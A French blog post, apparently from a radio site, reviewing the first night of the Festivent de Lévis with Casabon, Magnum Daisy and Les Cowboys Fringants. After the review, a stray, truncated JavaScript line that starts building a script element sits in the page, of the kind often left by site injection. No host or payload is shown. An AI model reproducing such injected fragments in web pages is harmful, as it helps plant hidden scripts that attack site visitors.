Première soirée du Festivent de Lévis : Casabon, Magnun Daisy et les Cowboy Fringant


Facebooktwitterredditpinterestlinkedinmail

Les Cowboys Fringants ont lancé la 29e édition du Festivent Ville de Lévis. Malgré une température plutôt très froide, c’est avec Casabon que les festivités ont commencé. Avec leurs chansons qui nous donnent le sourire et qui nous réchauffent. Casabon a su préparer la foule à l’arrivée du groupe de la soirée Les Cowboys Fringants. Il faut dire que Casabon roule depuis un bon moment et mérite d’être encore plus connu du côté de la chanson au Québec.

Par la suite la formation Magnum Daisy s’est présentée sur scène. N’ayant plus de présentation à faire ce quatuor composé de JF Dubé à la voix ‘’ex-chanteur de Noir Silence’’. Fire Lewis ancien guitariste de ‘’Martin Deschamps’’ Jean-Sébastien Baciu ancien bassiste de ’’Jonas & The Massive Attraction’’ et Stephane Gaudreau ex-batteur de ‘’Jean Leloup et Anik Jean’’. Nous ont présenté un bon rock digne de cette formation de musicien.

C’est avec un chrono bien mis en place que les 6 musiciens de la formation des Cowbows Fringants se sont présentés. Malgré que la scène Loto-Québec n’affichait pas complet, les Cowboys Fringants ont comblé l’attente de leurs fans qui étaient venu les voir en spectacle. Il faut dire que les Cowboys au Québec non plus rien à prouver à personne.

Dans l’ensemble se fus une agréable première soirée. Il faut dire que les autres journées à venir sont toutes aussi très intéressantes qui nous attendent. C’est une invitation spéciale de l’équipe d’UltimRadio et par le fait même une chance de nous rencontrer sur place.

var d=document;var s=d.createElement(‘script’);

Previous U2 : Nouveau Record
Next The Tea Party : Festivent Ville de Levis

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *